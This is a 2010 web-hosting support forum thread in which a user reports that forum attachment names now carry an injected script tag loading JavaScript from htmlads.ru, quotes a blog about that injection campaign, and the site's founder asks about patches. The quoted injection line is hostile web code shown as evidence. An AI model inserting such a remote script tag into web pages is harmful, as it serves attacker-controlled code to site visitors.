Ezboxx Ltd.
Main Menu
  Calendars
  Quotes
  About Us
EzBoxx Hosting
  Hosting Services
Portal Software
  Ezboxx.Anthem
  Overview
  Installation
  Download
  Portal FAQ
  Plugins
  Themes/Templates
  Change Logs
Community
  Forums
  Search
  Links to Portal Sites
  Cheers to these sites
 
Home
logon
register
 

Random quote: Light travels faster than sound. This is why some people appear bright until you hear them speak
- (Added by: Zan)


Injection attack?
Moderators: Ezboxx Staff

Jump to page : 1
Now viewing page 1 [25 messages per page]
   Ezboxx Hosting Related-> Hosting Support
    
 
Mutts
Profile
Contact
Albums
 
Message Options
Member

Posts: 14

 Posted 2010-01-08 5:19 AM
Subject: Injection attack?

Since the DNS problem.. & we switched to metropower.org.uk.. it has been spotted that attachments in the forum before that date now read "Chillin!.JPG<script src=http://www.htmlads.ru/ads.js></script> (65KB - 9 downloads)" for example, instead of just "Chillin!.jpg (65KB - 9 downloads)".

After some quick research this appears to be refered to as an injection attack

 (source - http://www.dynamoo.com/blog/2009_10_0... />

htmlads.ru injection attack

Another injection attack following on from this one, htmlads.js looks like it is being injected into IIS 6.0 servers. In this case, the string to look for in your logs in htmlads.js/ads. js which is worth checking for and blocking if you can.


For the records, the domain registration details are:

domain: HTMLADS.RU
type: CORPORATE
nserver: ns1.htmlads.ru. 75.34.216.140
nserver: ns2.htmlads.ru. 216.119.45.147
nserver: ns3.htmlads.ru. 72.48.193.152
nserver: ns4.htmlads.ru. 71.108.37.140
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private person
phone: +7 496 4047474
e-mail: tau@8081.ru
registrar: REGRU-REG-RIPN
created: 2009.10.05
paid-till: 2010.10.05
source: TC-RIPN

Labels: IIS, Russia, Viruses

*************************
 
Is this something on your host server that needs clearing or is it
something within the system that we need to clear from our end?

Cheers, Mutts.



Edited by Mutts 2010-01-08 5:35 AM
 
Zan
Profile
Contact
Albums
 
Message Options



Ezboxx Founder

Posts: 2707
2000500100100
 Posted 2010-01-09 2:27 AM
Subject: RE: Injection attack?

have you applied the latest patches?

there have been no repots of sql inject sicne we released the last set of patches a year or so ago.

 
Jump to page : 1
Now viewing page 1 [25 messages per page]
Printer friendly version
E-mail a link to this thread
Jump to forum :


Debug mode : Seconds to generate: [0.253] - Executed queries : [73]
Running MegaBBS ASP Forum Software v2.0
© 2003 PD9 Software
And Ezboxx Portal System Beta v 0.7.6
Delete all cookies set by this site